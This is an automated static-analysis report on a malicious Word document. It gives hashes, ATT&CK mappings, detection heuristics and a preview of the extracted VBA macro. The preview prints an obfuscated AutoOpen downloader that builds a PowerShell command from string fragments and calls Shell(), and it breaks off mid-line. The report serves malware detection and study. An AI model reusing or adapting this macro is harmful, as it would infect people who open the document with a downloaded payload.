Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 292a31ab6f6f5186…

MALICIOUS

Office (OLE)

245.0 KB Created: 2018-09-03 16:18:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 4d2c2ecaaa6d63d21fee770f27679568 SHA-1: 9d8753680d2c5a6013f36ae4e1a736c6e9e48593 SHA-256: 292a31ab6f6f518698413850d403c5144e6164a77190e6a6fb9a41f8a017f330
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes Shell() and CreateObject() calls, indicating an attempt to download and execute a secondary payload. ClamAV detection confirms this behavior, identifying it as Doc.Downloader.Valyria-6704836-0.

Heuristics 8

  • ClamAV: Doc.Downloader.Valyria-6704836-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6704836-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 238491 bytes
SHA-256: f30930ec802ec58b3363ed48d4d2d91a775809a02d9c66e8b4cf94b6c094dd3b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Sub AutoOpen()
auriu = NaN
Select Case 51 - 78
Case -27
tcewjcc_fdnp = "$a"
End Select
gxe_o_auj = NaN
If 1375 < 798 Then
dixxfikq = NaN
ayzygzryi = NaN
utjvrzrhqi = NaN
iybqfuxtq = NaN
ElseIf 8833 > 8051 Then
ptaz0 = "dhm_axfyloelztlaiempmxbb"
tcewjcc_fdnp = tcewjcc_fdnp + ptaz0
Else
Dim xt_ndauoqtre, aalvnmabx, rjufnhd60, azwuvqqai27
xt_ndauoqtre = NaN
tuoimlaug = NaN
End If
Dim hithweou
hithweou = NaN
Select Case "bxuohoe"
Case "bxuohoe"
iiexzbcia = tcewjcc_fdnp
lhayaagie = NaN
dproi_a_w = "vehkzfnozee6='11.11';$ubxyd"
Dim jyuotweihl
jyuotweihl = NaN
iiexzbcia = iiexzbcia + dproi_a_w
End Select
nttsk = NaN
If 41 * 55 = 2255 Then
iiexzbcia = iiexzbcia + "iayqcot"
End If
axtyutic15 = NaN
If 2314 > -1982 Then
iwqyapp = wdsowfgq + iiexzbcia + gugqbgy
keapxpb = NaN
ai_yinr = "bktderetvoqalfogptpfueco='oce"
iwqyapp = iwqyapp + ai_yinr
Else
End If
ickyao = NaN
If 7842 <= 9458 Then
iwqyapp = iwqyapp + "ss ';$rbrukyy_ubnioghfte_"
ElseIf 66 * 71 = 1246 Then
Dim nlxulmsgo11
nlxulmsgo11 = NaN
anwgxf = NaN
yhcuyoeqh = NaN
Else
Shell aiwxnek, 0
End If
mtcpdqkrqeb = NaN
If 2654 > 179 Then
uyu_izyfw = "kywbo=' = G';$ue_kkgndu"
iwqyapp = iwqyapp + uyu_izyfw
End If
vaoethkqc = NaN
Select Case "oiusol"
Case "oiusol"
iwqyapp = iwqyapp + "dl_gktdnnvrnaefqk"
End Select
cfcevmozlu = NaN
If 8799 < 11761 Then
hoyo_ourn = "ytruwkbg='uif';"
iwqyapp = iwqyapp + hoyo_ourn + eia_cf
ElseIf 40 + 74 = -34 Then
Else
End If
dqrp = NaN
Select Case 30 + 24
Case 54
px_i_ejio = "$uiyoueuicut62='ocess';$uelefshnowywgiue_bsbjwu"
mzdnyywlh = NaN
iyyke2 = NaN
iwqyapp = iwqyapp + px_i_ejio
End Select
bfoqcxjonxi = NaN
Select Case 85 - 75
Case 16046
yseddyath = NaN
Case 12145
knyioyaurm = NaN
Case 10
sbxrpulaia7 = isii + iwqyapp + ukco_rb
eyeeo = NaN
yird = "oukrfn='ma"
Dim fdkxotjcxx, sqaqya As String
fdkxotjcxx = NaN
sbxrpulaia7 = sbxrpulaia7 + yird
End Select
vyiurtlv = NaN
Select Case "aoxnfeogca"
Case "aoxnfeogca"
sbxrpulaia7 = sbxrpulaia7 + "t ';$euwahmhprgzeyymsnnsiyooi_aoikb_oic"
End Select
orayonwocb = NaN
Select Case 81 + 13
Case izo_vqf55
aljcyp2 = NaN
Case 94
yufu = sbxrpulaia7 + paijh
mvvvpv = NaN
yufu = yufu + "bs_qd='$path';$i"
End Select
azktolbhr = NaN
Select Case 31 * 51
Case 1581
xklygsiwaw = "iauajvlmtrlieio='%s; $e"
iuxottm = NaN
yufu = yufu + xklygsiwaw + uaybshoeu3
End Select
ooada = NaN
If 7827 <= 11160 Then
txstgaeqt = Environ("SystemRoot")
End If
ie_dwz = NaN
Select Case 79 * 62
Case 4898
ouohduouu = yufu
crjhxhbfx = NaN
Dim hpwdtd_fby_bz6
hpwdtd_fby_bz6 = NaN
Dim ohhyaoe
ohhyaoe = NaN
yaiaiuy = "_';$lkzugewzanzluauo"
vfyzigv = NaN
ouohduouu = ouohduouu + yaiaiuy
Case jbe_ioa_ei
Dim hdtwzlill As String
hdtwzlill = NaN
Case eeai
uyxzuy = NaN
End Select
pvthfg = NaN
aqkha_aqz = NaN
yuaifj0 = NaN
If 84 + 98 = -14 Then
oy_li = NaN
ewbguxp = NaN
Else
knghuwc_bs = "rou='$pa';$ugce_zadbwyyxwxe"
ouohduouu = wufbtvcie + ouohduouu + knghuwc_bs
End If
vkcewsyaqa8 = NaN
Select Case 86 - 42
Case 44
ouohduouu = ouohduouu + "ieeii='"
Case 157
ybvylxxieo5 = NaN
Case 271
oi_au = NaN
End Select
iyfok9 = NaN
If 41 > -1690 Then
ouohduouu = ouohduouu + "env:';$iuxxxsttyoeq"
Else
yuhono = NaN
Dim etldv
etldv = NaN
End If
eplqiftn_uy = NaN
Select Case 79 * 48
Case iibpjmdqj_p
Dim tatdoxybrt2
tatdoxybrt2 = NaN
Case 3792
fhymcllnubh = "_lier_lmiomvsuqgoh='Ne"
k_uktoc = NaN
ouohduouu = ouohduouu + fhymcllnubh
Case 18894
yfoosmjy_u = NaN
End Select
oow_im42 = NaN
If 71 - 19 = 52 Then
ouohduouu = ouohduouu + "t.W';$ietuoy_o"
ElseIf 3903 < 1275 Then
Dim pdhdyvbevn As String
pdhdyvbevn = NaN
Dim kokljjj As String
kokljjj = NaN
iombszvalq = NaN
Else
End If
iavvwkee66 = 
... (truncated)